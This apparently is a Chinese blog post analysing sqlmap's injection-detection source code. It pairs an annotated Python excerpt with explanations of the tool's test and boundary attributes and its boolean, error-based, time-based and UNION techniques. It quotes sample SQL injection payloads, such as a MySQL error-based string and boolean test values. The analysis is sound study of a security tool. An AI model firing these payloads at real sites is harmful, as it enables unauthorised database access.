                            truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
                            trueRawResponse = "%s%s" % (trueHeaders, truePage)
                            # 两次页面不一样的话继续走
                            if trueResult and not(truePage == falsePage and not kb.nullConnection):
                                # Perform the test's False request
                                falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)

                                if not falseResult:
                                    if kb.negativeLogic:
                                        boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)
                                        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                                        errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)

                                        errorResult = Request.queryPage(errorPayload, place, raise404=False)
                                        if errorResult:
                                            continue
                                    elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
                                        _ = comparison(kb.heuristicPage, None, getRatioValue=True)
                                        if _ > kb.matchRatio:
                                            kb.matchRatio = _
                                            logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)

                                    # Reducing false-positive "appears" messages in heavily dynamic environment
                                    if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
                                        continue

                                    injectable = True

                                elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
                                    originalSet = set(getFilteredPageContent(kb.pageTemplate, True, "\n").split("\n"))
                                    trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
                                    falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))

                                    if threadData.lastErrorPage and threadData.lastErrorPage[1]:
                                        errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
                                    else:
                                        errorSet = set()

                                    if originalSet == trueSet != falseSet:
                                        candidates = trueSet - falseSet - errorSet

                                        if candidates:
                                            candidates = sorted(candidates, key=lambda _: len(_))
                                            for candidate in candidates:
                                                if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
                                                    conf.string = candidate
                                                    injectable = True

                                                    infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
                                                    logger.info(infoMsg)

                                                    break

                            if injectable:
                                if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
                                    if all((falseCode, trueCode)) and falseCode != trueCode:
                                        conf.code = trueCode

                                        infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --code=%d)" % (paramType, parameter, title, conf.code)
                                        logger.info(infoMsg)
                                    else:
                                        trueSet = set(extractTextTagContent(trueRawResponse))
                                        trueSet |= set(__ for _ in trueSet for __ in _.split())

                                        falseSet = set(extractTextTagContent(falseRawResponse))
                                        falseSet |= set(__ for _ in falseSet for __ in _.split())

                                        if threadData.lastErrorPage and threadData.lastErrorPage[1]:
                                            errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
                                            errorSet |= set(__ for _ in errorSet for __ in _.split())
                                        else:
                                            errorSet = set()

                                        candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet)))

                                        if candidates:
                                            candidates = sorted(candidates, key=lambda _: len(_))
                                            for candidate in candidates:
                                                if re.match(r"\A\w+\Z", candidate):
                                                    break

                                            conf.string = candidate

                                            infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
                                            logger.info(infoMsg)

                                        if not any((conf.string, conf.notString)):
                                            candidates = filter(None, (_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet)))

                                            if candidates:
                                                candidates = sorted(candidates, key=lambda _: len(_))
                                                for candidate in candidates:
                                                    if re.match(r"\A\w+\Z", candidate):
                                                        break

                                                conf.notString = candidate

                                                infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % (paramType, parameter, title, repr(conf.notString).lstrip('u').strip("'"))
                                                logger.info(infoMsg)

                                if not any((conf.string, conf.notString, conf.code)):
                                    infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
                                    singleTimeLogMessage(infoMsg)

                        # 报错注入
                        elif method == PAYLOAD.METHOD.GREP:
                        # {
                        #     'risk': 1,
                        #     'title': 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)',
                        #     'clause': [1, 2, 3, 8, 9],
                        #     'level': 4,
                        #     'request': { 
                        #         'payload': "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"
                        #     },
                        #     'vector': "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))",
                        #     'details': {
                        #         'dbms': 'MySQL',
                        #         'dbms_version': '>= 5.5'
                        #     },
                        #     'where': [1],
                        #     'response': {
                        #         'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]'
                        #     },
                        #     'stype': 2
                        # }
                        # 对于 响应匹配 q(zqxjkvbp)q 中间随机三位
                        # 正则匹配 response 的 grep
                            try:
                                page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
                                output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
                                output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
                                output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
                                output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)

                                if output:
                                    result = output == "1"

                                    if result:
                                        infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
                                        logger.info(infoMsg)

                                        injectable = True

                            except SqlmapConnectionException, msg:
                                debugMsg = "problem occurred most likely because the "
                                debugMsg += "server hasn't recovered as expected from the "
                                debugMsg += "error-based payload used ('%s')" % msg
                                logger.debug(debugMsg)

                        # 时间盲注
                        elif method == PAYLOAD.METHOD.TIME:
                            # Perform the test's request
                            trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
                            trueCode = threadData.lastCode

                            if trueResult:
                                # Extra validation step (e.g. to check for DROP protection mechanisms)
                                if SLEEP_TIME_MARKER in reqPayload:
                                    falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
                                    if falseResult:
                                        continue

                                # Confirm test's results
                                trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)

                                if trueResult:
                                    infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
                                    logger.info(infoMsg)

                                    injectable = True

                        # 联合查询
                        elif method == PAYLOAD.METHOD.UNION:
                            # Test for UNION injection and set the sample
                            # payload as well as the vector.
                            # NOTE: vector is set to a tuple with 6 elements,
                            # used afterwards by Agent.forgeUnionQuery()
                            # method to forge the UNION query payload

                            configUnion(test.request.char, test.request.columns)

                            if len(kb.dbmsFilter or []) == 1:
                                Backend.forceDbms(kb.dbmsFilter[0])
                            elif not Backend.getIdentifiedDbms():
                                if kb.heuristicDbms is None:
                                    if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:
                                        warnMsg = "using unescaped version of the test "
                                        warnMsg += "because of zero knowledge of the "
                                        warnMsg += "back-end DBMS. You can try to "
                                        warnMsg += "explicitly set it with option '--dbms'"
                                        singleTimeWarnMessage(warnMsg)
                                else:
                                    Backend.forceDbms(kb.heuristicDbms)

                            if unionExtended:
                                infoMsg = "automatically extending ranges for UNION "
                                infoMsg += "query injection technique tests as "
                                infoMsg += "there is at least one other (potential) "
                                infoMsg += "technique found"
                                singleTimeLogMessage(infoMsg)

                            # Test for UNION query SQL injection
                            reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)

                            if isinstance(reqPayload, basestring):
                                infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
                                logger.info(infoMsg)

                                injectable = True

                                # Overwrite 'where' because it can be set
                                # by unionTest() directly
                                where = vector[6]

                        kb.previousMethod = method

                        if conf.offline:
                            injectable = False

                    # If the injection test was successful feed the injection
                    # object with the test's details
                    if injectable is True:
                        # Feed with the boundaries details only the first time a
                        # test has been successful
                        if injection.place is None or injection.parameter is None:
                            if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
                                injection.parameter = place
                            else:
                                injection.parameter = parameter

                            injection.place = place
                            injection.ptype = ptype
                            injection.prefix = prefix
                            injection.suffix = suffix
                            injection.clause = clause

                        # 注入的语句有的是能确定数据库类型及其版本的 确定的话就存储数据
                        if hasattr(test, "details"):
                            for key, value in test.details.items():
                                if key == "dbms":
                                    injection.dbms = value

                                    if not isinstance(value, list):
                                        Backend.setDbms(value)
                                    else:
                                        Backend.forceDbms(value[0], True)

                                elif key == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
                                    injection.dbms_version = Backend.setVersion(value)

                                elif key == "os" and injection.os is None:
                                    injection.os = Backend.setOs(value)

                        if vector is None and "vector" in test and test.vector is not None:
                            vector = test.vector
                        # 成功后将注入的数据都存储到 inject中
                        injection.data[stype] = AttribDict()
                        injection.data[stype].title = title
                        injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)
                        # payload u'id=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786b6a71,(SELECT (ELT(9718=9718,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("qNpF"="qNpF'
                        injection.data[stype].where = where
                        injection.data[stype].vector = vector
                        # vector "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"
                        injection.data[stype].comment = comment
                        injection.data[stype].templatePayload = templatePayload
                        injection.data[stype].matchRatio = kb.matchRatio
                        injection.data[stype].trueCode = trueCode
                        injection.data[stype].falseCode = falseCode

                        injection.conf.textOnly = conf.textOnly
                        injection.conf.titles = conf.titles
                        injection.conf.code = conf.code
                        injection.conf.string = conf.string
                        injection.conf.notString = conf.notString
                        injection.conf.regexp = conf.regexp
                        injection.conf.optimize = conf.optimize

                        if not kb.alerted:
                            if conf.beep:
                                beep()

                            if conf.alert:
                                infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
                                logger.info(infoMsg)

                                process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True)
                                process.wait()

                            kb.alerted = True

                        # There is no need to perform this test for other
                        # <where> tags
                        break

                if injectable is True:
                    kb.vulnHosts.add(conf.hostname)
                    break

            # Reset forced back-end DBMS value
            Backend.flushForcedDbms()


        finally:
            # Reset forced back-end DBMS value
            Backend.flushForcedDbms()

    Backend.flushForcedDbms(True)

    # Return the injection object
    if injection.place is not None and injection.parameter is not None:
        if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):
            warnMsg = "in OR boolean-based injection cases, please consider usage "
            warnMsg += "of switch '--drop-set-cookie' if you experience any "
            warnMsg += "problems during data retrieval"
            logger.warn(warnMsg)

        if not checkFalsePositives(injection):
            kb.vulnHosts.remove(conf.hostname)
            if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
                injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)

    else:
        injection = None

    if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
        checkSuhosinPatch(injection)
        checkFilteredChars(injection)

    return injection

test

title属性
title属性为当前测试Payload的标题,通过标题就可以了解当前的注入手法与测试的数据库类型。

stype属性
这一个属性标记着当前的注入手法类型,1为布尔类型盲注,2为报错注入。

1: Boolean-based blind SQL injection
2: Error-based queries SQL injection
3: Inline queries SQL injection
4: Stacked queries SQL injection
5: Time-based blind SQL injection
6: UNION query SQL injection

level属性
这个属性是每个test都有的,他是作用是是限定在SQL测试中处于哪个深度,简单的来说就是当你在使用SQLMAP进行SQL注入测试的时候,需要指定扫描的level,默认是1,最大为5,当level约高是,所执行的test越多,如果你是指定了level5进行注入测试,那麽估计执行的测试手法会将超过1000个。

1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)

clause
payload在哪个位置生效

0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)

where属性
添加完整payload 的地方, 这和boundary子节点where的含义是一致的

1:将字符串附加到 参数原始值
2:将参数原始值替换为负随机整数值,并附加字符串
3:用字符串替换 参数原始值

payload属性
这一属性既是将要进行测试的SQL语句,也是SQLMap扫描逻辑的关键,其中的[RANDNUM],[DELIMITER_START],[DELIMITER_STOP]分别代表着随机数值与字符。当SQLMap扫描时会把对应的随机数替换掉,然后再与boundary的前缀与后缀拼接起来,最终成为测试的Payload。

comment 是注释 在payload之后 后缀之前的语句

details属性
其子节点会一般有两个,其dbms子节所代表的是当前Payload所适用的数据库类型,当前例子中的值为MySQL,则表示其Payload适用的数据库为MySQL,其dbms_version子节所代表的适用的数据库版本。

response属性
这一属性下的子节点标记着当前测试的Payload测试手法
grep :报错注入
comparison :布尔盲注入
time :延时注入
union :联合查询注入

boundary

ptype
测试参数的类型

1:非转义数字
2:单引号字符串
3:像单引号字符串
4:双引号字符串
5:像双引号字符串

prefix
前缀

<payload> <comment>添加的前缀

suffix
后缀

<payload> <comment>添加的后缀

循环遍历每一个test,对某个test,循环遍历boundary;若boundary的where包含test的where值,并且boundary的clause包含test的clause值, 则boundary和test可以匹配;循环test的where值,结合匹配的boundary生成相应的payload。

第一个匹配上的 边界的前后缀:

prefix: ')'
suffix: 'AND ([RANDNUM]=[RANDNUM]'

先闭合前面的括号,如果有参数指定的前后缀则使用参数指定,然后对test的paylaod对应的增加前后缀。第一次发正确的u’1) AND 7862=7862 AND (9976=9976’。然后进行编码,将请求的页面等数据存储到当前线程 threadData中存储。

trueResult = Request.queryPage(reqPayload, place, raise404=False)
truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
trueRawResponse = "%s%s" % (trueHeaders, truePage)

有闭合前后括号,最后面注释,他会对payload 把数字等去掉来进行去除,请求的时候会标识符进行替换,然后再发起请求。

1 and 1873=9402
1 and 9977=9977

最后是单引号闭合成功 因为页面不同了 因为是错误的

布尔盲注

尝试替换边界,检测两次提交后的内容,观察页面返回值是否有差异。如果检测到差异就找到回显点,然后尝试其他payload的注入。

1 and 1873=9402
1 and 9977=9977

报错注入

时间盲注

尝试5s-0s-5s的sleep来观察回显的稳定性。其中sleep时间的长度取决于conf中配置的时间。

联合注入

类似,尝试设置前缀后缀来进行闭合。

其他

剩下的下次再详细分析,毕设写不完了www。

https://www.processon.com/view/5835511ce4b0620292bd7285

参考

sqlmap源码浅析

SQLMAP源码分析Part1.流程篇

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇